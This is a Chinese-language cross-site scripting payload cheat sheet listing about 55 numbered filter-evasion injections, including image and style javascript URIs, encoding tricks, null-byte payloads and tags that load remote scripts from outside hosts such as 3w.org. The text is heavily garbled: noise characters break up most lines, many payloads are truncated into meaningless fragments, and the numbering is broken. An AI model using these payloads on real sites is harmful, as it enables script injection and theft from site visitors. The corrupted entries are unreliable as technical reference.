(1)普通的XSS JavaScript注入
9 U. c8 J7 j# D$ L5 f$ O9 ]<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>3 Y" H" t/ j/ j" c6 X2 W
(99)另类弹框
3 ]! L& ]$ o% D- m<q/oncut=alert()>10 D, |8 t5 K& R
<s/onclick=alert()>b- ]: K' d! O- u! V; ?8 _$ Y
<XSS=" onclick="alert(1)//">clickme</SSX=">
1 L' S' q) F# x) x6 {) N% ? <zzz onclick=alert`1`>clickme</zzz> + H% b& K% h# }( p% }: ?
<a onclick=alert`1`>clickme</a>1 Y& `/ `7 N% F5 A( q" z, M
<a=">clickme</a=">
$ Y4 N5 C* P+ m5 f, a7 J8 j<a=">clickme</a>4 [* g1 _' G5 R6 Y% d& o r4 D
<z=">clickme</z=">
3 g. E; L% G% T; v7 V6 R<z onclick=alert`1`>clickme</z>
7 |. Q& G9 w0 J# U
3 h. H' z4 t: ?0 [. Q9 g(2)IMG标签XSS使用JavaScript命令" s5 l$ }+ }+ z/ b" C; S$ R
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>: ], x$ h5 v) }2 v. {# n# D( P9 q
& [( d. B. n) f$ G
(3)IMG标签无分号无引号
* H& Z3 _4 u1 `. Z$ }<IMG SRC=javascript:alert(‘XSS’)>4 v/ L9 V+ t. |& f3 J/ f4 U
" b6 B+ ^9 Y- @$ X2 \, [" h# r* B& U(4)IMG标签大小写不敏感
8 S0 l# o0 Q A+ f7 Z' {<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
' N% [ u+ K: x2 j( }& _
2 j ?: g7 W; Z' W% d6 K(5)HTML编码(必须有分号), v* ^% S4 `0 o7 C# x
<IMG SRC=javascript:alert(“XSS”)>
7 Z1 S+ _0 [9 O4 X, ]8 M$ e2 ^& I2 }5 J, @5 ?6 T1 S8 t1 f( G
(6)修正缺陷IMG标签8 k' ~5 N7 w; E0 l- j0 v$ T
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>0 w8 p* u. ?8 k" J+ X4 e. U
7 O+ s" d8 P& o
(7)formCharCode标签(计算器)
! G% I" y. t! V( d6 o0 ?) N<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
$ c' m9 B# \5 v6 O0 W) o+ G# ]5 M1 q6 R8 o: i
(8)UTF-8的Unicode编码(计算器). a4 f/ Y5 `- f8 Y) d0 J$ f0 R
<IMG SRC=jav..省略..S')>
- m3 I3 S; D6 G7 x" i, Y- r" O/ I& E. l3 C
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
$ l0 H8 U6 d3 o<IMG SRC=jav..省略..S')>
& \2 d! @- \' q* z) \3 K
0 C; B0 }, A3 [% F0 s+ ^(10)十六进制编码也是没有分号(计算器)! i b9 z2 G7 L# _
<IMG SRC=\'#\'" /span>
2 u7 i6 W4 X- H7 ]4 u: u7 o0 |/ H0 m0 j& k& b" p
(11)嵌入式标签,将Javascript分开* F' @5 H9 R( O! M. R9 B+ {" p
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”># l) b3 _6 o0 f$ i
6 t: j3 k( ]7 s6 j6 R3 N1 p- {
(12)嵌入式编码标签,将Javascript分开
3 G0 _ S0 ~7 V9 g7 T/ B5 t9 h<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
+ u7 F( l- D- G/ J; w' m( `! X6 c7 o) O- \7 A
(13)嵌入式换行符6 p# z" r# E5 C3 H
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>! _8 o, t3 M) p B
7 l" L4 ?4 T5 @/ V q9 E3 D, _" r* v(14)嵌入式回车0 d g6 R0 j+ M4 n7 L& G. }
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”> o+ F* X( R! e( \ U- T
* i7 E2 s7 H* ?6 g(15)嵌入式多行注入JavaScript,这是XSS极端的例子$ t" I9 |4 t: G+ `
<IMG SRC=\'#\'" /span>
4 Y& a, h3 v7 e( y7 a3 K/ |4 X# H% C3 k* \* g2 N& k( E4 x& }; _
(16)解决限制字符(要求同页面)
, p$ I( E) y: Z<script>z=’document.’</script>4 V0 z; C: H% o0 `" z! y
<script>z=z+’write(“‘</script>) @* [' ]' d+ F# X" Q1 j
<script>z=z+’<script’</script>
; X1 z) }8 f( W# M: z3 i<script>z=z+’ src=ht’</script>- G7 S% b h! ~; G5 {( G
<script>z=z+’tp://ww’</script>7 k( `8 W% {1 d# w$ k
<script>z=z+’w.shell’</script>( l9 X& k9 ]! r
<script>z=z+’.net/1.’</script>
$ K9 {9 d! k+ @9 u4 V' q0 a<script>z=z+’js></sc’</script>" n% r% x6 }; [4 S
<script>z=z+’ript>”)’</script>8 y; v- T* A; g$ p
<script>eval_r(z)</script>
* p6 H. J T/ u1 N& m4 E; K
+ J4 X/ j8 B [) s+ k+ |3 u1 c(17)空字符5 ]: t9 Q1 {6 j& }8 ]
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out9 Q! f6 i1 d7 Z2 c% S7 c
9 b, v6 r% {( C/ U# `(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用9 _1 {7 f8 Z7 _2 g" I& K
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out/ P1 B' W2 t3 A
" x" d1 U3 ]: \! U; i(19)Spaces和meta前的IMG标签
) ^& n. I! X5 }5 W3 `9 L$ `<IMG SRC=\'#\'" javascript:alert(‘XSS’);”>1 Z8 A9 o" S1 k( C5 i
' M* ?2 {" m4 ]0 t1 N0 y(20)Non-alpha-non-digit XSS" c: F5 ~/ c8 ~
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>7 J, p9 v' W5 K8 \/ T+ J) t, Y. }
- G2 |8 A( b! W* U( T. [(21)Non-alpha-non-digit XSS to 2) k! k' F: `6 R# L$ h8 M
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>: n" L( x0 g0 F( I+ ~3 g
' {6 l8 q' N6 K H. o R(22)Non-alpha-non-digit XSS to 30 S' _. h! J/ A" a# n
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
$ F$ a6 i! {: G' g$ v, U
& o" o3 A6 A W) \; B(23)双开括号
1 `1 h( o; _' M) v& ]<<SCRIPT>alert(“XSS”);//<</SCRIPT>! |0 u- K8 Y/ ~$ H: n" w
, e# e, }) S3 D7 A# \& j(24)无结束脚本标记(仅火狐等浏览器); ?# j E: h1 o# i- \
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
7 q8 V% X$ A- Y3 O9 ]5 C3 h* }6 W2 s4 d7 Z# m6 {* m- b
(25)无结束脚本标记28 z/ \' t. `6 Z6 v
<SCRIPT SRC=//3w.org/XSS/xss.js>
0 I( G2 v, a0 Z% w
) n8 d/ | \& }- `# ~( W& z& R# Y(26)半开的HTML/JavaScript XSS
' j" ?9 I0 b" v& _" } F6 A4 d<IMG SRC=\'#\'" /span>( u. W7 P* ~0 w2 i, F$ c& @
) F$ u- L8 c% f: a8 x0 v1 v
(27)双开角括号
! C) x' ^4 h+ l2 W) W<iframe src=http://3w.org/XSS.html <: R) f$ B8 R$ E3 [7 `+ d% ]* E
3 m: x% [; W) a5 p. S7 E* ^( w(28)无单引号 双引号 分号
3 ]' T# C/ \8 z" ^! _3 T<SCRIPT>a=/XSS/
3 d/ G- j. N5 Q% ~# e: j6 N" A0 Nalert(a.source)</SCRIPT>
0 T/ v9 W$ f' S% u
2 f( ^: G1 A5 x(29)换码过滤的JavaScript
( }* ?; d0 ?& a; N; g7 v\”;alert(‘XSS’);//& B7 z. C7 n* f% g4 ^+ Z2 z+ t
5 }* _9 I1 b* m8 l, |(30)结束Title标签" X* K9 l! s* {" x
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
0 a* Y! q2 N3 R! z( G' _7 L! x U- O% s$ ~5 f
(31)Input Image
5 f7 q* ~& X) X1 x; R<INPUT SRC=\'#\'" /span>
3 `# P4 a( k& D; u
, f6 c/ Y3 L8 g! X(32)BODY Image8 S0 \: @$ J$ b7 Z8 G
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
, a( j b" e/ j T$ o
+ y& t- m: [- ^% U1 I6 W3 X) ]) r(33)BODY标签
8 [$ A" Z$ |" r% f! @5 Y5 T, R, s/ ~<BODY(‘XSS’)>
1 D7 @+ d4 r4 {0 ?2 _; r. E# I) K# Q$ V' t. I! w
(34)IMG Dynsrc% Q- W$ y7 Q: J' o6 z
<IMG DYNSRC=\'#\'" /span>) M' b) G }- Z& w5 E8 S( L
, l5 ]3 s( R4 J: W' l$ z. Z0 P/ d(35)IMG Lowsrc" s6 K" |& K" A/ x* s# }0 l; a
<IMG LOWSRC=\'#\'" /span>/ n/ B% U# R5 _# F9 d
* z' j, u' m8 r8 q' l: q0 J
(36)BGSOUND
9 x# S( g, d) f6 }5 b6 {$ P<BGSOUND SRC=\'#\'" /span>( J9 u6 b& W4 \* z5 D
1 f! ]1 N7 q) z" v, R(37)STYLE sheet1 p) }( l5 H7 p3 ]( F: H
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
3 F- w" c, ]. g7 x: d6 r4 A- h) |
(38)远程样式表
) I: K. `% h3 b1 x+ }- j& c; w<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
u+ u5 G" W* O' h: D
* H- ?4 S, i0 [4 z/ O- j8 F! w9 q(39)List-style-image(列表式)# b) N9 P4 B0 {% x4 S: m0 t
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS' ?$ ?: ^& T9 R9 H
7 \. t% F! P& O* G( ~( }(40)IMG VBscript
: b+ ~9 U5 y4 }<IMG SRC=\'#\'" /STYLE><UL><LI>XSS/ D, R( m; c4 v
6 X6 v2 H) L$ N; Q) f1 K4 M! i" y(41)META链接url! d/ R9 ]$ G2 j
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
5 l; V7 S. \1 C% b6 ? k% X7 S1 U- E# v" G
(42)Iframe; }+ K# V8 y) C- o4 e/ I
<IFRAME SRC=\'#\'" /IFRAME>: X$ c- l3 F; P1 b+ [
9 Q# K* B% H* `2 k5 i6 {6 i
(43)Frame1 @2 x" Y y I3 O0 H7 k% U
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>' f2 _5 c* r/ h4 F. v1 T* O3 q
8 y8 `$ M, H; j% B$ G; X' k# o P
(44)Table+ M1 F& }+ k: x# N5 F
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”> t( ^5 W( v- X+ z, _
: }6 X% T7 c; J3 P) L(45)TD
! g* `& q" H- n0 B" G& [# Y; {<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
& E4 u1 Z! r% C
3 _2 n/ J2 W3 b(46)DIV background-image
: | I# d# p$ i' N+ l" @<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
9 l! _9 I8 @( h G8 d: J7 ~
+ B# u2 p6 D( B2 \(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)' k, C' x0 n3 ?4 z0 I) `; Z
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>6 a2 r: A( u8 |6 I% O# d$ ~7 G/ V
5 w# p) O" A' c0 l4 N$ F
(48)DIV expression
/ y6 m3 O( t& m<DIV STYLE=”width: expression_r(alert(‘XSS’));”>$ l5 `' L& z0 f& B/ R
/ q: I, x3 g/ }* G6 Q2 V
(49)STYLE属性分拆表达% `" U) R7 n" H
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>7 K7 h7 P6 v) h/ [6 ~
7 N# V' ]9 X3 G3 v(50)匿名STYLE(组成:开角号和一个字母开头)
4 p0 x; m; s" `' J4 L0 w# M<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>2 H+ |2 y7 k7 F" g, ?# @3 K* c# n! G# l
9 e# X6 B) P5 v: F1 V* ?* ~5 e" L: ^
(51)STYLE background-image. k7 k7 a1 t: e
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>( ]: K' u* I5 |. A) c
" y6 G( ^& |& D2 ^(52)IMG STYLE方式
$ g2 u) Q& b) jexppression(alert(“XSS”))’> D! |, ~7 ~- ?1 A, W `2 p
9 Z1 |9 ?. l* T( g& o/ _+ A/ u/ [
(53)STYLE background
Y! B: c. @: }" F<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
) E/ o( l0 q! w8 f& z- c; q! o% M
! t, O# U3 \! T3 S(54)BASE
; x8 D5 `! z' n7 ~/ e, q3 M<BASE HREF=”javascript:alert(‘XSS’);//”>1 K) y) }3 J0 T/ X9 \2 |
5 K. S7 X' a/ F& I(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS) I9 U' g) U; T6 Z# o
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>" n$ ~( k! i4 k7 |
|